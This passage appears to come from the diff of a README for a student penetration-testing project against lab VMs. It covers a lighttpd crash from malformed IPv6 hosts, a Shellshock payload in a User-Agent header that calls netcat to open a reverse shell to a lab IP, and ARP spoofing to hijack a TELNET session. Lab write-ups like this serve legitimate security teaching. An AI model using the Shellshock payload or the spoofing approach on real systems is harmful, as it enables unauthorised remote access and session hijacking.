Amnesthesia/EHAPT-Group-Project/README.md

 This leads to no change, however, increasing the colons in [::1] to more than 7 will cause Internal Server Error.
 This is documented [here](http://redmine.lighttpd.net/projects/lighttpd/repository/revisions/2959/diff/) on line 47 in requests.c

+#### Shellshock
+I believe these VMs were created before shellshock was discovered / patched, or it may have slipped the authors mind.
+I **think** I managed to get a remote code execution running using `wget` with the header ` User-Agent: () { :; }; /bin/bash -c "nc 192.168.248.132 6666 -e /bin/bash -i"` although this should not be possible, unless the default index page which we still do not know the name of is a `cgi-bin` script, and it might be.

+The VM suddenly started pinging me relentlessly and has been doing so for hours, but I cannot seem to get a reverse TCP shell with netcat going.

 #### ARP Spoof & TELNET hijack approach

 Using Wireshark I saw there was a TELNET connection going to an IP that did not exist on the network.
 I decided to ARPSPOOF and pretend I was this IP, and then listen for TELNET connection: And I got a connection!